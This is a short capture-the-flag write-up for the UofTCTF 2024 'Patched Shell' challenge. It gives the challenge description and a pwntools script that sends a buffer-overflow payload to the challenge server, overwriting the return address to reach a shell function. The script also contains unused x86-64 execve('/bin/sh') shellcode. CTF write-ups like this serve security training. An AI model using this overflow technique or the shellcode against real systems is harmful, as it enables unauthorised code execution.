UofTCTF 2024 : Patched Shell

Subject

Okay, okay. So you were smart enough to do basic overflow huh...

Now try this challenge! I patched the shell function so it calls system instead of execve... so now your exploit shouldn't work! bwahahahahaha

Note: due to the copycat nature of this challenge, it suffers from the same bug that was in basic-overflow. see the cryptic message there for more information.

Author: drec

nc 34.134.173.142 5000

Writeup

from pwn import *

#r = process('./patched-shell')
r = remote("34.134.173.142", 5000)
elf = ELF('./patched-shell')
addr_shell = elf.symbols['shell']
print(hex(addr_shell))
shellcode = b"\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05"
print(len(shellcode))
addr = b'\x37\x11\x40' + b'\x00'*5
payload = b'\x90'*(90 - 18) + addr
r.sendline(payload)
print(payload)
with open("payload", "wb") as f :
    f.write(payload)
r.interactive()